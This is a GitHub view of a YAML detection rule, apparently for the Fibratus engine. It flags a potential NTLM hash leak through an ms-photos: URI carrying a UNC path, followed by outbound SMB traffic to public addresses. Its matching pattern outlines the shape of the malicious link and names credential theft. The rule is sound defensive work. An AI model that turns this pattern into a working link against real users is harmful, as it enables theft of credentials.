-
-
Notifications
You must be signed in to change notification settings - Fork 214
Expand file tree
/
Copy pathcredential_access_potential_ntlm_hash_leak_via_ms_photos.yml
More file actions
37 lines (34 loc) · 1.34 KB
/
credential_access_potential_ntlm_hash_leak_via_ms_photos.yml
File metadata and controls
37 lines (34 loc) · 1.34 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
name: Potential NTLM hash leak via MS Photos
id: b5b70c6d-e265-477e-bd62-b4d05089e2ab
version: 1.0.0
description: |
Detects a potential NTLM hash disclosure via abuse of the ms-photos: URI
scheme with a UNC path parameter. An attacker can craft a specially formatted
link that, when opened, launches Microsoft Photos directly from a browser and
triggers outbound authentication, potentially leaking NTLM credentials.
labels:
tactic.id: TA0006
tactic.name: Credential Access
tactic.ref: https://attack.mitre.org/tactics/TA0006/
technique.id: T1187
technique.name: Forced Authentication
technique.ref: https://attack.mitre.org/techniques/T1187/
references:
- https://github.com/rubenformation/ms-photos_NTLM_Leak
condition: >
sequence
maxspan 1m
|spawn_process and
ps.parent.name ~= 'explorer.exe' and ps.name ~= 'Photos.exe' and
ps.cmdline imatches '*ms-photos:viewer?fileName=%5C%5C*%5C*%5C*'
|
|connect_socket and
evt.pid = 4 and net.dport = 445 and not cidr_contains(net.dip,
'127.0.0.0/8',
'10.0.0.0/8',
'172.16.0.0/12', '192.168.0.0/16')
|
output: >
Potential NTLM hash leak via MS Photos UNC path at address $2.net.dip
severity: high
min-engine-version: 3.0.0